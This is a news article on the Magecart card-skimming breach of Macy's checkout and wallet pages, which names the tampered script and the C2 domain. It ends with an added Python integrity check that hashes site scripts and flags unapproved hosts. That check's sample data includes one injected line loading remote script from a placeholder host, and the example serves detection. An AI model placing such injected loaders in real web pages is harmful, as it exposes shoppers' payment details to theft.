Macy's has announced a data breach caused by Magecart card-skimming code being implanted in the firm's online payment portal.
In a letter issued to customers, the company says that it was alerted to the security incident on October 15, and the Macy's team quickly found that card-skimming script had been injected into two pages on the Macy's website.
The code, believed to have been injected on October 7, impacted the Macy's checkout page and wallet page, the latter of which is accessed through the "My Account" facility.
"The unauthorized code was highly specific and only allowed the third-party to capture information submitted by customers," the US department store chain said.
While the code was removed on the same day Macy's was alerted to the problem, customers that have placed orders online or submitted financial details into their wallets may have had their information stolen.
This data includes first and last names, physical addresses, ZIP codes, email addresses, payment card numbers, card security codes, and expiration dates.
It is not known how many customers may have been embroiled in the data-stealing campaign, which lasted at least a week before Macy's knew of its compromise. However, a Macy's spokesperson told Bleeping Computer that only a "small" number of customers were involved, and they would be offered consumer protection services for free.
"We quickly contacted federal law enforcement and brought in a leading class forensics firm to assist in our investigation," the company says. "We have reported the relevant payment card numbers to the card brands. In addition, we have taken steps that we believe are designed to prevent this type of unauthorized code from being added to macys.com."
This sort of incident is known as a Magecart attack, an umbrella term used to describe card-skimming malware implants on otherwise legitimate e-commerce domains.
Payment data entered by shoppers is then harvested and sent to a command-and-control (C2) server, where it may be used to create clone cards, for fraudulent online purchases, or sold on in batch information dumps on underground forums.
An anonymous researcher investigating the Macy's attack told Bleeping Computer that a ClientSideErrorLog.js script was tampered with to host Magecart code. Once a victim submitted their payment details, this data was then whisked away to a remote C2 hosted at Barn-x.com.
When active Magecart campaigns are detected, malicious code needs to be stripped out and any vulnerabilities that made the code injection possible in the first place have to be resolved.
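As an added example (not from the article or from Macy's), this is the kind of routine integrity check that catches a modification like the one described: hash each first-party script against a trusted baseline and flag any script that references a host outside an allowlist. The script names, contents and allowlist below are constructed for the example.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample: trusted copy of each first-party script, archived at the
# last release (the baseline). Not the real Macy's code.
KNOWN_GOOD = {
    "ClientSideErrorLog.js": "window.onerror = function (msg) { report(msg); };",
    "checkout.js": "document.forms.checkout.onsubmit = validate;",
}
# Constructed sample of what the server is serving now: one script has gained a
# statement that loads code from a host outside the allowlist.
CURRENTLY_SERVED = {
    "ClientSideErrorLog.js": "window.onerror = function (msg) { report(msg); };"
    'var s = document.createElement("script"); s.src = "https://unlisted.example/x.js";',
    "checkout.js": "document.forms.checkout.onsubmit = validate;",
}
# Hosts first-party scripts are expected to reference (hypothetical allowlist).
ALLOWED_HOSTS = {"www.macys.com", "macys.com"}
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")

def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

def build_baseline(scripts: dict) -> dict:
    # Hash every trusted script so a later audit detects any byte change.
    return {name: sha256_hex(src) for name, src in scripts.items()}

def external_hosts(src: str) -> set:
    # Hosts named by absolute URLs inside the script body.
    return {urlparse(u).hostname for u in URL_RE.findall(src)}

def audit(baseline: dict, served: dict, allowed_hosts: set) -> dict:
    # Returns {script: {"status": ..., "unexpected_hosts": [...]}}; "missing"
    # and "new" scripts are reported too, since either is a change to the page.
    findings = {}
    for name in sorted(set(baseline) | set(served)):
        if name not in served:
            findings[name] = {"status": "missing", "unexpected_hosts": []}
            continue
        src = served[name]
        if name not in baseline:
            status = "new"
        elif sha256_hex(src) == baseline[name]:
            status = "unchanged"
        else:
            status = "modified"
        bad = sorted(h for h in external_hosts(src) if h and h not in allowed_hosts)
        findings[name] = {"status": status, "unexpected_hosts": bad}
    return findings
```

Run against a live site, the baseline would be built from the deployed release artefacts and the served copies fetched on a schedule; a "modified" status or a non-empty unexpected host list on a checkout or wallet page is the alert.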
Cybersecurity researchers are sometimes able to track the campaigns back to their C2s, which can be shut down by notifying hosts of their malicious purposes. However, as recently discovered by RiskIQ, these domains can be repurchased by threat actors once they are released back to the market, and if Magecart callouts are still active, they may be repurposed for ad fraud and malvertising.